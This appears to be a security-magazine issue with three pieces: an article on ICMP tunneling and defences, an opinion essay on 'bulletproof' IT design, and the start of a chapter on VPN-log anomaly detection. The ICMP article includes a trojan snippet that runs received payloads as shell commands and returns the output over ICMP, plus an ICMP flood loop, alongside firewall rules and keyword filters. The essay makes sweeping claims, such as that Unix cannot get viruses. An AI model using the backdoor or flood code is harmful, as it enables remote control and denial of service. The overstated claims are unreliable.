that one thread listens for incoming ICMP packets
while the other sends the replies typed by the user.

• Chat Protocol: The program sends each message in
the payload of an ICMP ECHO_REQUEST to the other computer.


Figure 2 is a snapshot of the ICMP packet as captured
by Wireshark.
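
The chat protocol described above can be illustrated with a short Python 3 sketch. It is not the article's constructPacket function; the names internet_checksum and build_echo_request are hypothetical. It builds an echo request (type 8, code 0) that carries the message as payload and fills in the standard Internet checksum.

```python
import struct


def internet_checksum(data: bytes) -> int:
    """One's-complement sum of 16-bit words, as used by ICMP."""
    if len(data) % 2:
        data += b"\x00"                      # pad odd-length input with a zero byte
    total = 0
    for i in range(0, len(data), 2):
        total += (data[i] << 8) | data[i + 1]
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)   # fold carries back in
    return ~total & 0xFFFF


def build_echo_request(payload: bytes, ident: int = 0, seq: int = 0) -> bytes:
    """Return an ICMP echo request (type 8, code 0) carrying payload."""
    # The checksum is computed with the checksum field set to zero.
    header = struct.pack("!BBHHH", 8, 0, 0, ident, seq)
    checksum = internet_checksum(header + payload)
    header = struct.pack("!BBHHH", 8, 0, checksum, ident, seq)
    return header + payload


packet = build_echo_request(b"Hello BSD")
```

Recomputing the checksum over the finished packet gives 0, which is how a receiver can validate it. Sending the packet would additionally require a raw socket and root privileges, which this sketch leaves out.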


Trojan Horse 

Covert channels are methods by which an attacker can
hide data inside a protocol so that the transfer goes
unnoticed. Covert channels rely on a technique called
tunneling, which allows one protocol to be carried over
another. ICMP tunneling uses ICMP echo-request and
echo-reply messages as a carrier for any payload an
attacker may wish to use, in an attempt to stealthily
access or control a compromised system. Because such
channels are hidden, they are generally difficult to detect
using a system's normal or unmodified security policy.
This makes ICMP tunneling an attractive mode of
transmission for a Trojan.

Although the payload of an ICMP packet often contains
timing information about packet delivery, no device
checks the content of the data. As it turns out, the
payload can therefore be arbitrary in content.
We can construct Trojan packets that masquerade
as common ICMP_ECHO traffic and use them as a backdoor
into a system, providing a covert method of getting
information from, and control over, a target machine.
Generally, Trojan software comes embedded in a
reliable-looking software archive and is intended to gain
the system password. When a user downloads this software,
it asks to be installed with ‘sudo’ privileges. At this
point the trojan gains entry into the computer and starts
executing. The software restarts itself after every reboot,
so unless someone is looking for it specifically, it is very
difficult to find. The trojan can be used to execute
commands remotely on the victim's machine and send the
output to the hacker’s computer. Since the entire
communication happens through ICMP packets, which are
normally used for network and host detection, such
messages are often ignored.

As shown earlier, trojan packets can be programmed
through ICMP tunneling and used to transfer files
across systems or to execute system commands remotely.
(Some commands may need sudo access, but that
information is easily compromised if the user trusts the
wrapping software enough to enter the credentials.)
A rough example of a program that executes commands
on the victim’s machine can be made from the chat
program we discussed earlier, by changing the
processMessage function in the victim’s copy of the
application to something like the following:


import subprocess


def executecmd(cmd):
    # Run the command in a shell, folding stderr into stdout
    p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
                         stderr=subprocess.STDOUT)
    return p.communicate()[0]         # captured output only


def processMessage(message):
    global source, sock, dest
    retval = executecmd(message)      # the received message is the command
    packet = constructPacket(8, retval, source, dest)
    sock.sendto(packet, (dest, 0))


Distributed Denial Of Service attacks

The following is a simple ICMP-based DDoS attack program.
It shows that a user is vulnerable even if his or her
machine has not been compromised. The program sends ICMP
packets containing random data to the victim’s machine,
which is forced to send replies. The packets
may carry a spoofed source address (and a cloned MAC
address if possible), so that the hacker's machine is not
bombarded with the echo replies and the origin of the
attack is difficult to trace.


import random, string


def DDOS(sock, destination_ip):
    while True:
        try:
            randomString = ''.join(random.choice(string.lowercase)
                                   for i in range(34))
            packet = constructPacket(8, randomString, '', destination_ip)
            sock.sendto(packet, (dest, 0))
        except:
            pass


By sending requests with a fake source address
(“spoofing”), hackers can make a target machine send
relatively large packets to another host. Note that an
ICMP response is not substantially larger than the
corresponding request, so there is no multiplier effect:
spoofing gives the attacker no extra power in a
denial of service attack. It might protect the attacker
against identification, though.

The “smurf” attack, named after its exploit program, is
a similar network-level attack against hosts. A perpetrator
sends a large amount of ICMP echo (ping) traffic to
IP broadcast addresses, using the spoofed source address
of a victim. On a multi-access broadcast network, there
could potentially be hundreds of machines replying to each
packet. Currently, the targets most commonly hit are
IRC servers and their providers. The system at the spoofed
address is hit by the large amount of traffic that the
intermediary (broadcast) devices generate.
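
The difference between a plain spoofed ping and a smurf attack is simple arithmetic, sketched below. The packet size (64 bytes) and the number of responding hosts (200) are made-up figures for illustration, and reply_traffic is a hypothetical helper.

```python
def reply_traffic(request_bytes, responders):
    """Bytes arriving at the spoofed address for one forged echo request."""
    # Each responder returns an echo reply about as large as the request.
    return request_bytes * responders


direct = reply_traffic(64, 1)       # ordinary spoofed ping: no multiplier
smurf = reply_traffic(64, 200)      # broadcast ping answered by 200 hosts
amplification = smurf // direct     # replies received per request sent
```

With these assumed numbers, a single 64-byte request produces 12,800 bytes at the victim, so the multiplier equals the number of hosts that answer the broadcast.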


Security Measures 

Blocking ICMP 

It is common practice to disable or block ICMP requests 
altogether on publicly visible servers. Google responds to 
Ping requests while Microsoft does not. Although this is 
effective, it may not be realistic for a production or real- 
world environment. 

Take the case of Path MTU. Path MTU (PMTU) discovery
is the mechanism that protocols use to discover
the largest supported MTU (maximum transmission unit)
along the path, in the hope of avoiding fragmentation.
The sender determines the largest possible size by
starting with the MTU of its local interface and sending
the data with the DF (don’t fragment) bit set in the IP
header. Either everything works as expected, or the sender
gets back a type 3 ICMP error with code 4,
“Fragmentation Required but the DF Flag is Set.” When this
happens, the sender knows that it must reduce the size of
the data it is sending. If no error returns, it assumes
that the MTU is fine.

The main problem with PMTU discovery is that when
people block ICMP, the error cannot reach the sending
host. Certain TCP implementations automatically retransmit
with a smaller segment size if they detect a packet
acknowledgement failure, but this is not common.
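
The mechanism, and the way it breaks when ICMP is blocked, can be simulated in a few lines. This is a sketch under stated assumptions: the path is modelled as a plain list of link MTUs, the function name discover_path_mtu is hypothetical, and the router is assumed to report its next-hop MTU in the error message, as RFC 1191 specifies.

```python
def discover_path_mtu(local_mtu, link_mtus, icmp_blocked=False):
    """Simulate PMTU discovery; return (size the sender settles on, delivered?)."""
    size = local_mtu
    while True:
        # The first link too small for the packet drops it, because DF is set.
        bottleneck = next((m for m in link_mtus if m < size), None)
        if bottleneck is None:
            return size, True       # the packet fits every link on the path
        if icmp_blocked:
            # The type 3, code 4 error never arrives, so the sender keeps
            # using a size that cannot get through.
            return size, False
        size = bottleneck           # the error tells the sender what to use next


path = [1500, 1400, 1492, 1280]     # hypothetical link MTUs along the path
```

With ICMP allowed, `discover_path_mtu(1500, path)` settles on 1280 and the data is delivered. With `icmp_blocked=True` the sender stays at 1500 and its packets are silently dropped.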

Understanding ICMP helps in making firewall policy
decisions and in diagnosing routing issues. Applications
and other protocols rely on ICMP to work properly, so the
impact of blocking ICMP completely should be assessed
before taking such action. Instead of blocking ICMP
altogether, it is wiser to allow type 3 messages
(Destination Unreachable), in particular code 4
(fragmentation needed but DF set), and either to specify
the explicit network areas from which ping requests and
replies are accepted or to block the addresses from which
you do not want them.


Firewall Rules 

Disable part of the ICMP traffic allowed by a firewall. For
example, disable incoming echo requests while allowing
outgoing echo requests. If naively implemented, policies
like this still allow covert communication and only limit
which host has to start it. In addition, outgoing
ICMP packets could be used to establish a unidirectional
channel for sending compromised information. It is
important to understand how operating systems respond to
ICMP messages, since this allows us to determine which
types of ICMP messages should be allowed in and out of the
network. With the packet filtering device appropriately
configured to block unnecessary ICMP messages, potential
threats resulting from ICMP messages can be reduced.
This, however, should be done wisely and selectively.

Hence the first stage in network security against this
type of attack is to build up sophisticated firewall rules
that allow only trustworthy nodes into your network. Some
examples of firewall rules that can be implemented are:


1. Drop all incoming echo-request packets.

iptables -A INPUT -p icmp --icmp-type echo-request -j DROP


2. Drop all outgoing ICMP echo request packets
from a source IP to a destination IP.

iptables -A OUTPUT -p icmp --icmp-type 8 -s $SOURCE_IP -d $DEST_IP -j DROP


3. Drop all incoming echo reply packets.

iptables -A INPUT -p icmp --icmp-type 0 -j DROP

4. Drop all outgoing echo reply packets.

iptables -A OUTPUT -p icmp --icmp-type echo-reply -j DROP


However, setting up such rules leads to a large number 
of problems for those who want to work in an open net- 
work or need the ICMP messages over the entire net- 
work for proper functioning. 
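
To see why a naive rule set only limits which host starts the conversation, the rules can be modelled as a first-match list. The sketch below is a toy model in Python, not how iptables is implemented; the Rule class, the verdict function and the addresses are hypothetical.

```python
from dataclasses import dataclass
from typing import Optional

ECHO_REPLY, ECHO_REQUEST = 0, 8


@dataclass
class Rule:
    chain: str                     # "INPUT" or "OUTPUT"
    icmp_type: int
    action: str                    # "DROP" or "ACCEPT"
    src: Optional[str] = None      # None matches any address
    dst: Optional[str] = None


def verdict(rules, chain, icmp_type, src, dst, default="ACCEPT"):
    """Return the action of the first matching rule, else the default policy."""
    for r in rules:
        if (r.chain == chain and r.icmp_type == icmp_type
                and r.src in (None, src) and r.dst in (None, dst)):
            return r.action
    return default


# Only rule 1 from the list above: drop incoming echo requests.
rules = [Rule("INPUT", ECHO_REQUEST, "DROP")]

inbound_ping = verdict(rules, "INPUT", ECHO_REQUEST, "198.51.100.7", "10.0.0.1")
outbound_ping = verdict(rules, "OUTPUT", ECHO_REQUEST, "10.0.0.1", "198.51.100.7")
inbound_reply = verdict(rules, "INPUT", ECHO_REPLY, "198.51.100.7", "10.0.0.1")
```

In this model the inbound ping is dropped, but an inside host can still send an echo request and receive the reply, so a tunnel started from the inside passes untouched.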


General ways to mitigate attacks 


• Limit the size of ICMP packets. Large ICMP packets
can be treated as suspicious by an IDS, which can
inspect the ICMP packet and raise an alarm.
However, since there are legitimate uses for large
ICMP packets, it is difficult to determine whether a large
ICMP packet is malicious. For example, large echo
request packets are used to check whether a network is
able to carry large packets. Differentiating legal from
illegal large packets is even more difficult if the covert
communication is encrypted.


Allowing only fixed-size ICMP packets would not prevent
ICMP tunneling either, since the data can be broken into
smaller, fixed-size chunks and reassembled by the
receiver. The size of the data is easily changed, even to
a fixed size, by adding one layer that controls
sequence numbering, offset, etc.


• Preserve the state of the ICMP packet to check for
covert channels. This can be done with a daemon that,
for each client echo request, constructs a new echo
request with a new sequence number, a new time to live,
and a new payload (with a new checksum). When the reply
is received, the daemon checks that the data is the same
as what was sent, and that the sequence number and the
responder’s IP address are valid and as expected. After
a successful check, the echo reply can be transmitted
back to the original client.


Although the state-preserving technique can easily prevent
ICMP tunneling, it is a computing-intensive process.
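
The bookkeeping such a daemon needs can be sketched as follows. This is an illustrative Python sketch only: the EchoProxy class and its method names are hypothetical, and the actual sending and receiving of packets is left out.

```python
import os


class EchoProxy:
    """Track proxy-generated echo requests and validate the replies."""

    def __init__(self):
        self.pending = {}          # (destination IP, sequence number) -> payload sent
        self.next_seq = 0

    def new_request(self, dest_ip, size=56):
        """Create a fresh sequence number and payload for an outgoing request."""
        seq = self.next_seq
        self.next_seq = (self.next_seq + 1) & 0xFFFF
        payload = os.urandom(size)     # replaces whatever the client supplied
        self.pending[(dest_ip, seq)] = payload
        return seq, payload

    def reply_is_valid(self, responder_ip, seq, payload):
        """Accept a reply only once, and only if it mirrors what was sent."""
        expected = self.pending.pop((responder_ip, seq), None)
        return expected is not None and expected == payload
```

Because the client's own payload never leaves the network and each reply is accepted only once, data hidden in either direction is discarded. The price is one table entry and one comparison per ping.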


• Another way to remove ICMP tunneling could be to
simply truncate the data field of ICMP. However,
truncation of the data field would require amendments to
the RFC. Scanning and erasing the ICMP data field is
compliant with the RFC and prevents ICMP tunneling
irrespective of the type of firewall used.

• Simply marking out unused and potentially dangerous
portions of ICMP packets is a straightforward
task and requires little overhead on a modest system.
Simple string scans are also not costly and can be
done to test for unencrypted covert communication.
This is highly recommended for end hosts, where
it adds minimal overhead. For routers it can be
expensive; there, simply disabling ICMP Echo Reply
can work. Encrypted channels are more
difficult to scan.
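
Both ideas, scanning the data field and erasing it, are sketched below in Python. The keyword list and the function names are assumptions chosen for illustration, and an encrypted payload would pass the scan unnoticed, as noted above.

```python
KEYWORDS = {b"sudo", b"rm", b"ls", b"cat", b"system"}    # illustrative list only


def looks_like_command(payload: bytes) -> bool:
    """Flag payloads containing a whitespace-separated token from KEYWORDS."""
    return any(token in KEYWORDS for token in payload.lower().split())


def scrub(icmp_packet: bytes) -> bytes:
    """Zero the data field of an echo message, keeping its length.

    The first 8 bytes are the ICMP header. The checksum in that header
    would have to be recomputed afterwards; that step is omitted here.
    """
    header, data = icmp_packet[:8], icmp_packet[8:]
    return header + bytes(len(data))
```

Matching whole tokens rather than substrings keeps harmless payloads containing, say, "tools" from triggering on "ls", at the cost of missing commands glued to other text.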


ICMPSec 
The idea of ICMPSec is inspired by IPSec, which is used to
secure IP packet transfer in IPv6. Internet Protocol version
6 (IPv6) is the latest revision of the Internet Protocol (IP).
IPv6 was developed by the Internet Engineering Task
Force (IETF) to deal with the long-anticipated problem of
IPv4 address exhaustion. IPv4 and IPv6 are not
interoperable. ICMPv6 forms a critical part of the
functioning of the protocol and is mainly used in error
detection, stateless address autoconfiguration (SLAAC) and
packet fragmentation. IPSec uses Security Associations (SA)
along with Authentication Headers (AH) and the
Encapsulating Security Payload (ESP) to protect IP
messages on an end-to-end basis. An ICMP message not
protected by AH or ESP is unauthenticated, and its
processing and/or forwarding may result in denial of service.

But it is expected that many routers and hosts will not 
implement IPsec for transit traffic owing to its complexity 


Listing 2. Basic outline for the LEARNING MODULE ALGORITHM
(Pseudo Code)

GENERAL_SCAN()
    Set T;
    Set MAX_TOT;          # initial number of packets allowed in T seconds
    Set BUFFER_PACKETS;   # for allowing increase in number of packets
    Set OVERFLOW;         # max times MAX_TOT can be increased
    Set MAX_RECV;         # number of total packets received in T seconds
    Set times_increased = 0;

    if MAX_RECV < MAX_TOT:
        MAX_TOT = MAX_RECV + BUFFER_PACKETS
    else
        MAX_TOT = MAX_RECV + BUFFER_PACKETS;   # Increasing MAX_TOT
        times_increased++
        if times_increased > OVERFLOW:
            FILTER_THE_PACKETS()

FILTER_THE_PACKETS()
    Store the ip address in an array where MAX_RECV > MAX_TOT
    and number of times it goes like that in interval of T seconds.
    If happens for more than X times:
        PATTERN_DETECTION()
    If happens for more than Y times:
        Block the ip address

PATTERN_DETECTION()
    Check data packet size <= 56 bytes
    Make the data payload null if possible.
    Or encrypt the payload and send to application layer.
    Else look if the payload field has commands like ‘rm’
    or ‘ls’ ...
    Check the sequence numbers of all incoming packets -
    generally they do not follow the incremental pattern
    in case of an attack
and thus strict adherence to IPSec would cause many ICMP
messages to be discarded. Also, when transmitting small
packets, the encryption process of IPSec generates a large
overhead. This diminishes the performance of the network.

To minimise the complexities involved in building an
IPSec module in the kernel, we propose to build an ICMP
security application (ICMPSec) which will try to address
the vulnerability concerns of the ICMP protocol. It is a
module which will capture ICMP packets at the kernel level
and scan and filter them for intrusion detection and
intrusion prevention.

The program that we aim to develop to counter these 
security vulnerabilities will include some of the strategies 
already discussed to prevent ICMP data leakage: 


• IDENTIFY PACKET RATIO: A large number of ICMP
packets from a single source can be a sign of a
DDoS attack. The program will identify such packets
and only allow traffic that does not exceed a certain
packets-per-time ratio (keeping the source
fixed). But DDoS attacks generally originate from
multiple sources; to tackle that, we can generalise the
program to enforce the ratio irrespective of the
source.

• PATTERN DETECTION OF DATA FIELD: The number
of bytes in the data field must be limited to a fixed
maximum (for example 56 bytes).
This will prevent large amounts of data from going out
in a single packet (unless hacker programs support
fragmentation, in which case stricter measures are
required). Major data leaks can be prevented
by proper scanning of the data field. Keywords like
‘sudo’, ‘ls’, and “system” commands can be detected with
a proper filter in place, although the data could be
encrypted, and hacker programs might use sophisticated
encryption and decryption techniques.

• PROPER SEQUENCING OF PING PACKETS: Multiple
echo replies to a single echo request packet must
be stopped. Also, all packets must follow a proper
sequencing protocol, so that packets from unreliable
source programs (with random sequence numbers) at
the application level are not sent.

• ENCRYPTION OF DATA FIELD: Generally the data
in ping packets is not useful. Most of the information
can be inferred from the code number as well.
The payload of an ICMP packet is often timing
information, which can be dealt with as a special case.
Otherwise, all outgoing packets can have their data field
encrypted with a key the host chooses, so that even
if the hacker receives any of the packets, they make
no sense to him unless he has the key too.
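
The first strategy, a packets-per-time limit for each source, might look like the following sliding-window sketch. The class name IcmpRateLimiter and the limit of three packets per second are assumptions for illustration; timestamps are passed in explicitly so that the behaviour is easy to follow.

```python
from collections import defaultdict, deque


class IcmpRateLimiter:
    """Allow at most max_packets per source within a sliding time window."""

    def __init__(self, max_packets, window):
        self.max_packets = max_packets
        self.window = window                   # window length in seconds
        self.seen = defaultdict(deque)         # source -> timestamps of allowed packets

    def allow(self, source, now):
        stamps = self.seen[source]
        while stamps and now - stamps[0] >= self.window:
            stamps.popleft()                   # forget packets outside the window
        if len(stamps) >= self.max_packets:
            return False                       # over the ratio: drop the packet
        stamps.append(now)
        return True


limiter = IcmpRateLimiter(max_packets=3, window=1.0)
burst = [limiter.allow("10.0.0.7", t) for t in (0.0, 0.1, 0.2, 0.3)]
```

Here the fourth packet of the burst is refused. To enforce the ratio irrespective of the source, as the first bullet suggests, the same limiter can be called with one constant key instead of the source address.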
The module is based on a self-learning algorithm which
identifies the average number of incoming and
outgoing packets and the ratio between them. The
algorithm works well for implementation purposes with
simple test data, but it is naive; it can easily be
generalised to larger test data and to more complex
algorithms involving clustering and Markov models.
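
One possible reading of the GENERAL_SCAN step from Listing 2 is sketched below in Python. Parts of the printed listing are hard to read, so the update rule for the threshold is an assumption, and the class and method names are hypothetical.

```python
class GeneralScan:
    """Adaptive packet threshold, following one reading of Listing 2."""

    def __init__(self, max_tot, buffer_packets, overflow):
        self.max_tot = max_tot                 # packets allowed per interval
        self.buffer_packets = buffer_packets   # headroom added to the observed load
        self.overflow = overflow               # how often the ceiling may be raised
        self.times_increased = 0

    def end_of_interval(self, max_recv):
        """Update the threshold after one interval; True means start filtering."""
        if max_recv < self.max_tot:
            # Assumed: the threshold follows the normal load downwards.
            self.max_tot = max_recv + self.buffer_packets
            return False
        self.max_tot = max_recv + self.buffer_packets    # raise the ceiling
        self.times_increased += 1
        return self.times_increased > self.overflow


scan = GeneralScan(max_tot=100, buffer_packets=10, overflow=2)
decisions = [scan.end_of_interval(n) for n in (50, 80, 200, 500)]
```

With these made-up numbers the threshold adapts three times and the fourth interval triggers filtering, at which point the per-address checks of FILTER_THE_PACKETS would take over.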

Even with proper filtering of ICMP traffic, an Intrusion
Detection System must still be deployed to monitor
ICMP activity and analyse any anomalies in the
received data.


Dear JP Morgan, Target,
Neiman Marcus, Michael's,
Home Depot...


My original intent was to write a kind of smart-ass open letter to the
above victims of recent system breaches and data theft, pointing out
the various mistakes they made in putting together their IT systems.
After some consideration, I decided that it would be less patronising
to merely present best practice in system security as a series of points,
with a short discourse on the relative merits of each point.


What you will learn...

• All the components of a bulletproof IT system
• How to design an IT installation


What you should know...

• Basic knowledge of Unix
• Basic knowledge of Web Servers


I promise not to insult your intelligence by telling you
to close all ports except 80 on your firewall or by telling
you how to set up the permissions on the operating
system. Instead, we'll list all the components of a
bulletproof IT system, and you can choose to omit various
parts if the extra risk is justifiable.


A Bulletproof IT System

Let's assume that we want to design a hypothetical IT
installation, which can be considered to be for either a
retail operation or a financial institution, equipped with
either POS or ATM terminals, operated by bank cards or
store cards.

The system will possibly consist of a web server, with
your landing page and login page, a database server, a
business server, which contains transaction records and
account details, and an authentication server, which
confirms the identity of each system user.


The Hardware

Don't run your web server on an Intel processor. Use Sun,
Hewlett-Packard, or IBM proprietary hardware.

I did say “Bulletproof”, so this recommendation has
to be included; but, before you say “As if!”, ask yourself
this question:


“In what language is malware written?”


If you answered “x86/x64 assembler”, then you win a prize. 

Malware is written to run on an Intel CPU, since these 
are universally deployed in machines throughout the 
world, and it is cost-effective for the hacker to concentrate 
his efforts on malware which will attack the largest target 
market (no pun intended). 

So even if the bad guys manage to plant their rubbish 
on your machine, it won't run. 

Of course this is, at best, security by obscurity since 
when enough companies have made the switch, hackers 
will learn how to write malware for other CPUs. 

However given the current market forces, this is unlikely 
to happen in the next decade, which may justify the cost 
of removing this large element of risk. 

If I ran a bank, I'd do it.


The Operating System

Use Unix

If you can’t use Unix, stop reading now and go and find
something else to do.

Unix was designed to be used by hundreds of university 
students and software developers, with the express intent 
that they should be incapable of interfering with each oth- 
er or breaking each other’s toys. The concept of permis- 
sions saw to that. 

Unix doesn't suffer from viruses since the worst a virus 
can do is trash the environment of the person who intro- 
duced it. It can’t replicate because it doesn't have per- 
mission to do so, and it can’t infect the boot sector or the 
memory for the same reason. 

PCs were designed to be Personal Computers, and nei- 
ther DOS nor Windows was designed to be used by more 
than one person. This is why they had no network capa- 
bility until MS ported the BSD socket libraries to Windows 
(remember ‘winsock.h’?)

Some people don’t like Linux because it’s a bit too home- 
grown, and they’d like the warm fuzzy feeling of being able 
to contact a support person if something falls apart. 

If you really must use an Intel CPU, these versions of
Unix (in order of preference/support) will do it:


• Sun Solaris. Easy to install, excellent support.

• Xinuos, derived from SCO OpenServer (reportedly
used by McDonald’s, Pizza Hut, NASDAQ et al.)

• Apple OS X. Well, it is Unix...

• CentOS (okay, so it’s Linux, but it’s very robust).


The Network 
• Each server on its own subnet


It's a fundamental law of system design that the only thing 
accessible from the web should be the web server. The 
other components, like the database server and business 
server, should be totally invisible. In other words, it should 
be impossible to type a URL into a browser and access 
any of the other system components. 

We do this by running everything except the web server 
on a separate subnet. 

It works like this: The web server (probably Apache)
is configured to proxy pages from the business server.
The business server is configured to accept connections
only from the CGI of the web server. As far as the user’s
browser is concerned, its address bar shows the pages as
if they were resident on the web server. If the user types
the apparent address into the address bar, Apache will
respond with ‘404 - page not found’.

Otherwise you'd be able to directly access bank balance
sheets by typing a URL.
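
The acceptance rule on the business server amounts to a check on the peer address. Here is a minimal Python sketch using the standard ipaddress module; the addresses, the subnet and the function name are hypothetical, and a real installation would enforce the same rule in the firewall as well.

```python
import ipaddress

WEB_SERVER = ipaddress.ip_address("10.0.1.10")        # hypothetical web server
BACKEND_NET = ipaddress.ip_network("10.0.2.0/24")     # hypothetical back-end subnet
BUSINESS_SERVER = ipaddress.ip_address("10.0.2.20")   # lives on the back-end subnet


def business_server_accepts(peer: str) -> bool:
    """Accept a connection only if it comes from the web server."""
    return ipaddress.ip_address(peer) == WEB_SERVER
```

A browser on the Internet never appears as the peer of the business server; only the web server does, acting on the browser's behalf.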


The Apache Server


• Remove GET permission from the cgi-bin directory

• Remove POST permission from the htdocs directory
and the icons directory

• Remove any files from these directories which shouldn't
be there, such as backup copies of web pages.


Backdoors are planted with POST queries to the htdocs
and icons directories. Utilities such as ‘wget’ are used
to suck all the files from any accessible directory and
recreate a copy of your website, which is then used to
spread malware and recruit members for a botnet.
Additionally, all the web pages retrieved from your htdocs
directory get examined by the hacker (especially the
JavaScript and hidden inputs) for clues as to how to hack
your system through your CGI.


The Application Software 


• Don’t use PHP: Around 90% of all hack attempts
exploit known vulnerabilities in PHP and applications
written around it, such as Joomla and WordPress.
Attack queries usually attempt to overwrite index.php,
wp-login.php and a whole bunch of images in
WordPress and Joomla.

• Only use compiled code for CGI executables:
Anything which runs in an interpreter, such as shell
scripts, Perl scripts, Ruby or PHP scripts, can have
code understood by the interpreter added to it. This is
how SQL injection and cross-site scripting are done. In
this context, if your website uses forms, make
absolutely certain that whatever collects the form data is
not an interpreted script.

• Only do trivial form integrity checks in JavaScript.
JavaScript can be read directly in a user’s browser and
rewritten by a hacker. If you do something dumb, like
user authentication, in JavaScript, you'll find yourself with
a few extra unexpected users logged in to your system.
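
Whichever language collects the form data, a common complementary safeguard against SQL injection is to bind user input as query parameters rather than pasting it into the SQL text. The sketch below uses Python and its standard sqlite3 module only to stay consistent with the other examples in this issue; the table, its contents and the function name are made up.

```python
import sqlite3


def find_account(conn, username):
    """Look up a balance; the ? placeholder binds username as data, not SQL."""
    cur = conn.execute("SELECT balance FROM accounts WHERE name = ?", (username,))
    return cur.fetchall()


conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE accounts (name TEXT, balance INTEGER)")
conn.execute("INSERT INTO accounts VALUES ('alice', 100)")
conn.commit()

honest = find_account(conn, "alice")
attack = find_account(conn, "' OR '1'='1")
```

The classic injection string is compared literally against the name column and matches nothing, so the second lookup comes back empty.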


BYOD - The Enemy Within 
Don’t BYOD. Turn off DHCP or, at least, limit it to a few 
known, trusted MAC addresses. 

Resist the attempts by HR to make you feel guilty, and 
point out that other people’s money is at risk, and that the 
company’s hardware is good enough for the users. 

Sure, MAC addresses can be faked, but the risk of that
happening is less than the risk associated with throwing
free IP addresses at anyone with a laptop. If you permit
uncontrolled BYOD, you deserve to get hacked. Even if
everyone is security-conscious and trustworthy, they will
be going home with your data on their devices. Ask the
FBI about a certain operative, who left his laptop on a
park bench...

Also, nobody stays in one job forever. When they leave 
the company, perhaps to join your competitor, they will be 
taking your data on their mobile phones, slabs and lap- 
tops. Of course, you can always wipe the hard drive. 

Yeah, right. 


POS Terminals, ATMs and other entry points
See “Authentication”.


Authentication 


• Don’t use username/password: My granny can write
you a man-in-the-middle script which will collect
these things by the hundreds. She can also write
another script which will use them to log in to your
system, especially if you let her use her own laptop on
your WiFi.

• Don't use biometrics: Despite sounding like the
perfect uncrackable method of identifying a user,
biometric data is stored and transmitted in digital
format. This means that the simplest
man-in-the-middle attack (as performed by my granny,
earlier) can save and store for reuse a username
and its related biometric data. This method is no
more secure than username/password.

• Two-factor authentication at its most basic is a card
and PIN: Ask customers of the companies mentioned
in the title of this piece how secure that is. Even if the
card is replaced by a dongle, everything works fine
until the POS or ATM has malware installed on it,
which reads all the credentials.

• For the only truly uncrackable method, read this
paper: http://www.finextra.com/blogs/fullblog.aspx?blogid=9812


Intrusion Detection System 

Use content-based, not rule-based systems: A rule-based 
system refers to a huge table of known hack sites, be- 
fore deciding whether to allow the connection. Apart from 
the fact that a huge number of available systems are just 
badly-written interpreted scripts, with the response time 
of an offshore call centre, they suffer from the obvious 
drawback that the number of “known” hack addresses is 
far outweighed by the unknown ones. Yes, you do get up- 
dates, but the hackers get more than you. 
A content-based IDS looks at the incoming query itself,
rather than trying to guess whether the source address is
good or bad. If it sees, for instance, a string like “../../../” in
the query, it’s a fair bet that it’s not a potential customer.

Similarly, if it sees a query partly written in hexadecimal
ASCII codes, it again assumes that the sender is after
your savings.

Best of all, having identified a hacker, the IDS can add
a firewall rule to block his address. No need to wait for a
third-party update.
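
A content-based check of this kind can be sketched in a few lines of Python. This is not the IDS referred to in this article; the patterns, the threshold of three hex escapes and the function names are assumptions, and the blocked set merely stands in for adding a firewall rule.

```python
import re

TRAVERSAL = re.compile(r"\.\./")             # directory traversal attempts
HEX_ESCAPE = re.compile(r"%[0-9a-fA-F]{2}")  # characters written as hex codes

blocked = set()                              # stand-in for firewall block rules


def is_suspicious(query, max_hex_escapes=3):
    """Judge the query by its content, not by its source address."""
    if TRAVERSAL.search(query):
        return True
    return len(HEX_ESCAPE.findall(query)) > max_hex_escapes


def inspect(source_ip, query):
    """Return True if the query may pass; block the sender otherwise."""
    if is_suspicious(query):
        blocked.add(source_ip)
        return False
    return True
```

A small allowance for hex escapes is kept because legitimate queries encode the occasional space or punctuation mark; how large that allowance should be is a tuning decision.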

Such an IDS is described in detail here:
http://www.linkedin.com/pulse/article/20140927080143-5739491/-a-gentleman-s-guide-to-intrusion-detection-and-protection?trk=mp-edit-rr-posts


In Conclusion 
A few years ago, I was at a training course on the island
of Guernsey.

Lured by the descriptions of the wild nightlife, on the 
neighbouring island of Jersey, a few of us decided to take 
an evening flight on one of the strange wood-and-paper 
aeroplanes, called ‘Islanders’, that used to make the trip 
at the time. 

While we sat in the hotel bar, waiting for the airport bus,
a storm of enormous proportions blew up, with lightning,
howling winds and horizontal rain. Then, a figure came
towards us, and said, “Look, I have to go since I'm the pilot.
You guys still have a choice”.

Fueled with copious quantities of the local ethylene 
hydroxide, we ignored his advice, piled on the bus, and 
made the trip. 

This article is a bit like that. My company is in the se- 
curity business, so we can't afford not to implement all of 
the measures mentioned above. Your company probably 
isn’t, so you can choose what works for you. 


Finding Security Insights, Patterns, and Anomalies
in Big Data. Access Analytics


There are so many ways that malicious users can access
IT systems right now. In fact, the very technologies affording
us the convenience to remotely access our IT systems are
the ones that are being manipulated by malicious users.
In today’s IT environment, physical access is no longer
a hindrance to gaining access to internal resources and data.


Remote access technologies such as the virtual private
network (VPN) are commonly used in business
environments. While these technologies
provide increased efficiency in terms of productivity, they
also introduce another level of risk into an organization.
There have been many incidents lately stemming from
remote access intrusions. In fact, several studies
indicate that the majority of data breaches were linked to
third-party components of IT system administration.

It is important to have a security program where we can 
quickly identify misuse of system access. In so doing, we 
are able to limit any damage that could be done through 
an unauthorized access. But how can you, as a securi- 
ty professional, track anomalous behavior and detect at- 
tacks? We need to have efficient ways of monitoring re- 
mote access data. 

Unfortunately, many current products for third-par- 
ty remote access do not offer granular security settings 
and comprehensive audit trails. If they do, they do not 
have advanced misuse or anomaly detection capabili- 
ties that will help security professionals identify poten- 
tial unauthorized access scenarios. 

In this chapter, we would like to provide some techniques
and tools that could help you in these types of scenarios.
Some of the things we will explore include knowledge
engineering, by means of programming detection strategies.
If you do not know how to program, do not worry. We will
provide simple techniques and step-by-step walk-through
instructions to get you going.


TECHNOLOGY PRIMER 

First off, we will provide a brief background of the technol- 
ogies involved in our scenario. As you can tell by the in- 
troduction, we will be focusing on detecting unauthorized 
access in remote access technologies. 

You may already be familiar with some of the technologies
that we will be using in our scenario: they include
remote access, VPN, and Python. Our main data set in our
scenario is VPN logs. We will use Python to create a
program that will process the VPN logs. Our goal is to use
a variety of techniques to identify anomalies in our data set.

First off, let us talk about our data and the technology 
that is involved in it. 


Remote Access and VPN 

What is VPN? 

Basically, VPN is a generic term for a combination
of technologies that allow one to create a secure tunnel
through an unsecured or untrusted network, such as
a public network like the Internet. This technology is used
